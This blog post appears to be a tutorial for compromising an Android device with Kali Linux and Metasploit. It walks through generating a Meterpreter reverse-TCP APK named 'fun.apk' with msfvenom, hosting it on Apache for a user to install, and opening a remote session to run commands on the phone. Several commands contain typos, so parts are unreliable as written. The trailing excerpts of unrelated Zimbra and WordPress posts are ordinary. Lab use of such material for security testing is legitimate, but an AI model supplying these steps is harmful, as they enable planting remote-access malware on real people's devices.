Skip to main content

Demo for Mobile (Andriod) App Hacking using Kali Linux and Metasploit Framework


What is Kali Linux ? 

 Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali contains several hundred tools which are geared towards various information security tasks, such as Penetration Testing, Security research, Computer Forensics and Reverse Engineering.
What is Metasploit Framework ? 

 The Metasploit Framework is an open source penetration testing and development platform that provides exploits for a variety of applications, operating systems and platforms. Metasploit is one of the most commonly used penetration testing tools and comes built-in to Kali Linux.

 Please follow the below for the Testing of Andriod Mobile  using Vulnerable Mobile App (Using Metasploit Framework)

1. Install the KALI LINUX in Virtual BOX/VMWARE

2. Install the Andriod OS in Virtual Box  from https://www.osboxes.org/android-x86/


Android-x86 4.4-r4 (download this Version)
3.Please follow the below for the Testing of Andriod using App (Using Metasploit Framework)


4. Create the MALWARE for Andriod


#msfvenom -p andriod/meterpreter/reverse_tcp lhost=192.168.50.21-o /root/fun.apk


5. Share the app to user/Mobile Phone  using apache or Email.


#start apache2 start
#start postgresql start

Borwse the IP to verify the Web server is Running

Create the Folder in /var/www/html/fun/

Copy the file fun.apk to /var/www/html/fun/


6. In the Kali VM Start the postgresql by using 

# service postgresql start
#msfconsole
msf>set payload andriod/meterpreter/reverse_tcp
msf exploit(handle)>set LHOST 192.168.50.21(KALI VM IP ADDRESS)
msf .....>show options
msf......> exploit -j z

(We need to Wait for Andriod Device to install APK)

Browse the Website /fun/ & Install fun.apk
In andriod go to Download and install apk See the permission


Go to Kali Linux We will see the session is there

>sessions -i 1
>help
(It will show the commands)
>ifconfig
>ps
>ls



Comments

Post a Comment

Popular posts from this blog

Password Expiry notification for the users in zimbra 8.x within 7 Days for the email users

This Script will run as cron tab daily basis and it will alert the users for whom password is going to expire within 7 days. It will also alert admin for the users for whom password expired. Kindly replace the domain.com with your own domain name and the  /opt/zimbra/postfix-2.10.3.2z/sbin/sendmail  path to the actual path of postfix #!/bin/bash #Script for zimbra password expiry email notification. # Meant to be performed as daily cronjob run as zimbra user.  # redirect output to a file to get a 'log file' of sorts. # Time taken of script; echo "$SECONDS Started on: $(date)" # Set variables: # First notification in days, then last warning: FIRST="7" LAST="3" # pass expiry in days, we are assuming passwd exiry is 150 Days POLICY="150" # Sent from: FROM="admin@domain.com" # Get all users - it should run once only. USERS=$(ionice -c3 /opt/zimbra/bin/zmprov -l gaa domain.com) #Todays date, in seconds: DATE
Post a Comment
Read more

How to Create a Delegated Admin Account in Zimbra 8.x

How to Create a Delegated Admin Account in Zimbra 8.x. Create a File as shown below with the contents .  Replace the domain.com and helpdesk Email id with your domain and helpdesk (Delegated Admin ) Name. #vi admindelegate #!/bin/bash # $1 domain.com # $2 helpdesk zmprov ma $2 zimbraIsDelegatedAdminAccount TRUE zmprov ma $2 zimbraAdminConsoleUIComponents cartBlancheUI zimbraAdminConsoleUIComponents domainListView zimbraAdminConsoleUIComponents accountListView zimbraAdminConsoleUIComponents DLListView zmprov ma $2 zimbraDomainAdminMaxMailQuota 0 zmprov grantRight domain $1 usr $2 +createAccount zmprov grantRight domain $1 usr $2 +createAlias zmprov grantRight domain $1 usr $2 +createCalendarResource zmprov grantRight domain $1 usr $2 +createDistributionList zmprov grantRight domain $1 usr $2 +deleteAlias zmprov grantRight domain $1 usr $2 +listDomain zmprov grantRight domain $1 usr $2 +domainAdminRights zmprov grantRight domain $1 usr $2 +configureQuota zmprov g
Post a Comment
Read more

How To Migrate a WordPress website/web-app from Test environment to Production /Hosting Server

I f a Developers has developed a website/Web App on WordPress on His Laptop /Desktop . Following needs to be Take Care/implement while Migration the wordpress  to the Production Server. Assuming the URL is www.domain.com and Localfolder  name is webfolder   1.        www.domain.com should point to the IP Address (A.B.C.D) 2.         Replace all the entries in the Mysql Database from localhost to www.domain.com 3.        If the Developer is using http://localhost/webfolder for development following needs to be updated in .htaccess file Check the error_log under apache Logs ; If the Logs are like this [Thu Oct xxxx xxx xxx ] [core:error] [pid 1472] [client X.y.z.c:64854] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://www.domain.com/wp-admin/index.php     The .htaccess file whi
Post a Comment
Read more